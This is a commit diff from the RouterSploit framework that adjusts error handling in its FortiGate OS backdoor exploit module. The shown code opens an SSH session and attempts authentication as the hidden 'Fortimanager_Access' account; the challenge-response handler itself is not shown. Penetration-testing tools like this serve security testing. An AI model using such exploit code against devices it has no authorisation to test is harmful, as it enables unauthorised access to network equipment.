Fortigate backdoor exceptions.

ebba273c · Marcin Bury · 5ef8a7ac · ebba273c
Commit ebba273c authored 9 years ago by Marcin Bury
Show whitespace changes
Inline Side-by-side

Showing with 7 additions and 4 deletions

fortigate_os_backdoor.py ...sploit/modules/exploits/fortinet/fortigate_os_backdoor.py +7 -4

No files found.
--- a/routersploit/modules/exploits/fortinet/fortigate_os_backdoor.py
+++ b/routersploit/modules/exploits/fortinet/fortigate_os_backdoor.py
@@ -37,8 +37,6 @@ class Exploit(exploits.Exploit):
    port = exploits.Option(22, 'Target Port')
    def run(self):
-        print_status("Running module")
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
@@ -46,6 +44,9 @@ class Exploit(exploits.Exploit):
            client.connect(self.target, username='', allow_agent=False, look_for_keys=False)
        except paramiko.ssh_exception.SSHException:
            pass
+        except:
+            print_error("Exploit Failed - SSH Service is down")
+            return
        trans = client.get_transport()
        try:
@@ -100,14 +101,16 @@ class Exploit(exploits.Exploit):
            client.connect(self.target, username='', allow_agent=False, look_for_keys=False)
        except paramiko.ssh_exception.SSHException:
            pass
+        except:
+            return False  # target is not vulnerable
        trans = client.get_transport()
        try:
            trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
        except paramiko.ssh_exception.AuthenticationException:
            pass
-        except Exception, e:
+        except:
-            return None
+            return None  # could not verify
        try:
            trans.auth_interactive(username='Fortimanager_Access', handler=self.custom_handler)